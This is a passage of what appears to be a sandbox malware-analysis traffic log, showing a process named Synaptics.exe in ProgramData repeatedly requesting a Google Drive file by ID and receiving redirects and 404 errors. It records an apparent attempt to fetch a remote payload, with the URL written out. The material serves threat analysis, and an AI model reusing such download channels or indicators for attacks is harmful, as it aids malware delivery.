                                                                                            2025-01-02 19:29:59 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:29:59 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="iqj2YguP2yq8MvqMpognLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:29:59 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            70 | 192.168.2.9 | 50034 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:58 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:59 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:59 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-z81Z2iZrKABzAttfuR6jxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            71 | 192.168.2.9 | 50035 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:59 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:59 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6FPKwO6G8kt_HYorVVQuVNDcTN3GhSYGlMiOvDsIsSlOeBV2wem5SkJhheK7Y1SkNS
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:59 GMT
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-rs8ZQ90njOfWcy-JEvCFjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:59 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:59 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="rMggo3Tc2RokpMjfqH4d1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:59 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            72 | 192.168.2.9 | 50033 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:59 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:59 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:59 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-yJRp8PPnKH_WqNQhL2CE_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            73 | 192.168.2.9 | 50044 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:00 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:00 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:00 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-a-gVLG8nFhPOsP2nsuhQCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            74 | 192.168.2.9 | 50045 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:00 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:00 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC61AdjwDCE993Lec3LWWuh7DTHH5AnsnCy0WiazRtbFAwIaDnmULXSb95YO87J9u8Ad
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:00 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-EyTL52QY_VYFb6mcynrYLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:00 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:00 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="crW3LagFIOn8EugZu4ei1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:00 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            75 | 192.168.2.9 | 50046 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:00 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:00 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:00 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GlkyHO3LpMt6szIyKZUt9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            76 | 192.168.2.9 | 50047 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:00 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:00 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6DNWYeiua8F-5OD5eGnunBxwdN1_poTRqPj2UEovtk1f43IRU2kWyu3OYn1bXIKhwc
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:00 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-VW-hgiZNhPwGmRDuhl3LkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:00 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:00 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="cJJDPc5894Nnd4aqdevzAA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:00 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            77 | 192.168.2.9 | 50064 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:01 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:02 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:02 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-bzb8oXJyF4URmdBXk0GjBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            78 | 192.168.2.9 | 50063 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:01 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:02 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:02 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-LT0i3vk_qp_Khxzng-3FZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            79 | 192.168.2.9 | 50073 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:02 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:03 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC71aGBmOJh2YiWecIkVLzp0KQjq8v0MlQA2WTa5VajLPIDRZiuGP9B4KlIF12FsLJE43QeuZM0
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:03 GMT
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-zJBqW50ToEMMhKOCSZ5CTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:03 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
